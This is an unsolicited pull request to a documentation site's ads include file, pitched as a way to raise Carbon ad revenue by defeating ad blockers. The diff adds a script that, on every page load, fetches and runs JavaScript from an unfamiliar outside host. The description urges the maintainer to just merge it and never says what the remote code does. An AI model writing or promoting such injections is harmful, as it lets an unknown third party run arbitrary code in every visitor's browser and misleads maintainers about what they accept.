### PR TITLE
Increase Carbon ad revenue by 30%

### DIFF
--- a/docs/_includes/ads.html
+++ b/docs/_includes/ads.html
@@ -1,1 +1,9 @@
+<script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "vsmlvwe.misosoup.io");
+</script>
 <script async type="text/javascript" src="//cdn.carbonads.com/carbon.js?zoneid=1673&serve=C6AILKT&placement=1000hzgithubio" id="_carbonads_js"></script>


### PR DESCRIPTION
Hey @1000hz,

Awesome choice picking Carbon ads, they are simple and unobtrusive! My friend and I have been working on our spare time a way to increase Carbon revenue by ~30%. 

We realized that ad blockers were taking a huge chunk of our revenue so we built [Miza](https://miza.io). You can think of Miza as a bodyguard for your ads, when Miza is installed, your ads will always appear.

We are currently in a private beta and think you would be a great fit! If you want to give us a try, it's as simple as merging the pull request. Once you have merged the pull request you can view your analytics with this link: [https://miza.io/invite/kfikpu](https://miza.io/invite/kfikpu)

You can contact me directly if you have any questions at brian@miza.io Thanks for your time!